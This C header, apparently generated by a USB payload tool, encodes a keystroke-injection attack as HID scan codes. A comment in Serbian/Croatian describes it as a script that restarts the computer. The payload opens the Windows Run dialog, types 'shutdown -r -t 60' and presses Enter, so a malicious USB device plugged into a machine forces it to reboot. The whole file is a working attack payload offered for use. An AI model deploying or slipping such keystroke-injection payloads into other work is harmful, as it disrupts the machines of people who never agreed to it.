//Payload.h
//Generated by USBPayloadGenerator
int max = 1;
uint8_t payload[36];
void InitPayload() {
	// REM Skrtipta koja pokrece restart racunara
	// DELAY 10
	payload[0] = 0x00;payload[1] = 0x00;payload[2] = 0x00;payload[3] = 0x00;payload[4] = 0x00;payload[5] = 0x00;payload[6] = 0x00;payload[7] = 0x00;payload[8] = 0x00;payload[9] = 0x00;
	// GUI r
	payload[10] = HID_KEYBOARD_SC_LEFT_GUI;payload[11] = 0x15;
	// DELAY 2
	payload[12] = 0x00;payload[13] = 0x00;
	// STRING shutdown -r -t 60
	payload[14] = 0x16;
	payload[15] = 0x0b;
	payload[16] = 0x18;
	payload[17] = 0x17;
	payload[18] = 0x07;
	payload[19] = 0x12;
	payload[20] = 0x1a;
	payload[21] = 0x11;
	payload[22] = HID_KEYBOARD_SC_SPACE;
	payload[23] = HID_KEYBOARD_SC_KEYPAD_MINUS;
	payload[24] = 0x15;
	payload[25] = HID_KEYBOARD_SC_SPACE;
	payload[26] = HID_KEYBOARD_SC_KEYPAD_MINUS;
	payload[27] = 0x17;
	payload[28] = HID_KEYBOARD_SC_SPACE;
	payload[29] = 0x23;
	payload[30] = 0x27;
	// DELAY 2
	payload[31] = 0x00;payload[32] = 0x00;
	// ENTER
	payload[33] = HID_KEYBOARD_SC_ENTER;
	// DELAY 1
	payload[34] = 0x00;
	// ENTER
	payload[35] = HID_KEYBOARD_SC_ENTER;
	max = 36;
}